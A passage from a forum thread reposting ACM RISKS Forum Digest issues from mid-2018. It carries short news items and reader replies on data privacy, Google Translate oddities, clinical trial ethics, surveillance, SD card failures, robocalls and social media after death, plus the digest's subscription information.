    certain trusted third parties (for example, providers of customer support
    and IT services) to help us provide, improve, protect, and promote our
    Services."

    Exactly how the study improved Dropbox services was not clear from the HBR
    article or the Dropbox blog post, though Dropbox representatives told WIRED
    the insights into how teams collaborate would help the company design better
    features.

    http://www.wired.com/story/dropbox-sharing-data-study-ethics/

    ------------------------------

    Date: Sun, 22 Jul 2018 14:00:40 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Why is Google Translate spitting out sinister religious prophecies?
    (Motherboard)

    Google Translate is moonlighting as a deranged oracle -- and experts say
    it's likely because of the spooky nature of neural networks.

    http://motherboard.vice.com/en_us/a...te-spitting-out-sinister-religious-prophecies

    Garbage in, "gospel" out? Which other neural networks can be corrupted by
    nonsense? Maybe Star Trek had it right, Kirk destroying evil computers by
    feeding them jabberwocky...

    ------------------------------

    Date: Sun, 22 Jul 2018 17:24:38 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Google DRM for Email can be disabled by ticking a few boxes in
    Firefox (Boing Boing)

    http://boingboing.net/2018/07/22/adversarial-interop.html

    ------------------------------

    Date: Sun, 22 Jul 2018 17:30:31 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How Google's Safe Browsing Helped Build a More Secure Web (WiReD)

    http://www.wired.com/story/google-safe-browsing-oral-history/

    ------------------------------

    Date: Tue, 24 Jul 2018 13:21:40 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Orrin Hatch tweeted at Google that he's not dead (Insider)

    http://www.thisisinsider.com/orrin-hatch-tweeted-google-not-dead-2018-7

    Hmm, Wikipedia isn't gospel; who knew...

    ------------------------------

    Date: Mon, 30 Jul 2018 08:00:18 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Nationals' Trea Turner is the latest MLB player to have ugly tweets
    uncovered (WashPo)

    A Nationals spokeswoman said the team is aware of the racially insensitive
    and homophobic tweets and is gathering more information.

    http://www.washingtonpost.com/news/...est-mlb-player-to-have-ugly-tweets-uncovered/

    ------------------------------

    Date: Mon, 30 Jul 2018 08:01:34 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Braves' Sean Newcomb addresses ugly old tweets right after just
    missing a no-hitter (WashPo)

    The second-year Atlanta starter's roller coaster Sunday capped
    a far more eventful late-July MLB series than usual.

    http://www.washingtonpost.com/news/...-tweets-right-after-just-missing-a-no-hitter/

    ------------------------------

    Date: Mon, 30 Jul 2018 08:05:50 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Data allowing people to print out their own guns temporarily
    blocked from Internet in PA, after legal pressure. (WashPo)

    Distribution of the schematics allowing people to make homemade guns is
    protected by the First Amendment, the company argues.

    http://www.washingtonpost.com/news/...ked-from-internet-in-pa-after-legal-pressure/

    ------------------------------

    Date: Sat, 21 Jul 2018 11:29:49 -0700
    From: "Robert R. Fenichel" <b...@fenichel.net>
    Subject: Re: employees as subjects in clinical trials (Maziuk, RISKS-30.76)

    Dmitri Maziuk says "I'm not quite sure what makes med AI coders so
    different" from medical researchers, but the difference is in the stage of
    the activity (routine vs. experimental), not in the personnel.

Medical research (clinical trials) is regulated differently from medical
practice, and the ethical restrictions are different, too. RCTs are tightly
regulated (by FDA, Health Canada, EMEA, or similar bodies in other
countries) and by Institutional Review Boards, with ethicists chiming in on
every detail. Medical practice is loosely regulated by state licensing
boards and hospital committees, with practitioners mostly left to practice
as they see fit.

    The extreme case is first-in-man trials of a new drug. They offer no
    benefit to the subjects, who usually don't have the disease that the drug is
    hoped to treat. I'm glad that there are people who will volunteer to be
    subjects in those trials, but no one could be forced to do it. Maziuk
    reports that El Al maintenance crews are required to be passengers, but they
    are presumably not required to be test pilots.

    Robert R. Fenichel, M.D., http://www.fenichel.net

    ------------------------------

    Date: Sun, 22 Jul 2018 20:02:55 -0400
    From: Jeff Jonas <je...@panix.com>
    Subject: A few short replies to RISKS-30.76

    replying to Richard M Stein
    Subject: The cameras that know if you're happy - or a threat (bbc.com)

"This technology motivates the old aphorism to
'Keep smiling, the boss likes idiots.'"

Starbucks already does that: hires and rewards people who smile.
A lot. All the time.
http://valuesdrivenresults.com/starbucks-hires-best/

    *****

    replying to Richard M Stein
    Subject: China Expands Surveillance of Sewage to Police Illegal Drug Use

    "April Fools for 2019:
    The PRC expands surveillance to detect halitosis and BO."

    1) Bad breath can be indicative of medical problems (cavities), but the term
    "halitosis" was allegedly a marketing ploy:

    http://www.smithsonianmag.com/smart-news/marketing-campaign-invented-halitosis-180954082/

    2) Homeless people are being harassed more than ever. Everywhere. In some
    countries, it is illegal to be homeless where the police will harass and
    beat them with impunity. There are already sensors to deter folks from
    using elevators as restrooms. I fear data and sensor fusion will make a more
    hostile environment for the already desperate:
    http://en.wikipedia.org/wiki/Anti-homelessness_legislation

    On the bright side, in Elizabeth NJ
    "2 homeless men found bombs, saved lives"
    http://www.nj.com/union/index.ssf/2016/09/homeless_men_found_bombs_saved_lives_walked_with_a.html

    *****

    replying to Benoit Goas
    Subject: Micro SD cards silently switching to read-only when they're "too old"

    "The 64G Patriot micro SD ... just decided to turn itself into a
    read-only memory card."

    That seems like a reasonable fail-safe to the end of life condition, but
    1) as mentioned, most software/firmware does not detect the condition
    2) when it switches from read/write to read-only,
    I fear some file system data might not get written,
    leading to unrepairable inconsistencies.
    The operating system understands what data is higher priority
    but the SD card probably cannot infer that.
    3) it's a lot better than the way hard drives tend to fail
    so catastrophically that all data is lost.

    *****

    replying to Benoit Goas
    Subject: Birds are making expensive roaming calls (The Register)

"A new risk when tracking birds (or any other kind of stuff):
someone managed to recover the SIM card from the tracker, and used it!"

    A bright side of IoT: some cellphone providers have SIM card plans for low
    data usage, perhaps with usage caps such as texting/SMS only.

    *****

    replying to Monty Solomon
    Subject: Robo-calls are getting worse.

    Some **** thinks that engineers want to get phone calls and talk about their
    trade-journal subscriptions instead of just completing a bingo-card or web
    form. That's why I rarely answer my phone during the day. The moment I
    answer ONE call, I'm flooded with more. I suspect I'm flagged on their
    sucker's list: answer one call and obviously you're interested in more. All
    day.

    They're poisoning their own well.

    *****

    replying to Benoit Goas
    Subject: We're not allowed to die anymore (NYTimes)

"In the same kind of problems, a(n old) friend of mine died recently, and
Facebook wants me to organize an event for his birthday"

    1) Consider http://leonardbernstein.com/at100
    Leonard Bernstein at 100 is the world-wide celebration
    of the 100th birthday of Leonard Bernstein,
    the composer, conductor, educator, musician, cultural ambassador,
    and humanitarian, officially beginning on August 25, 2017

    2) Not only the famous get such consideration. Several friends have
    recently died. Friends and family want their Internet social-media to
    remain intact to remember and honor them.

    3) the Jewish "unveiling" ceremony honors the deceased, normally a year
    after the burial. My take is that it's mostly for the family to remember
    and honor the person, not to forget them.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.77
    ************************
     
  13. LakeGator

    Risks Digest 30.79

    RISKS List Owner

    Aug 8, 2018 5:06 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Wednesday 8 August 2018 Volume 30 : Issue 79

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    The Midterm Elections Are in Serious Danger of Being Hacked, Thanks to Trump
    (Mother Jones)
    West Virginia to introduce mobile phone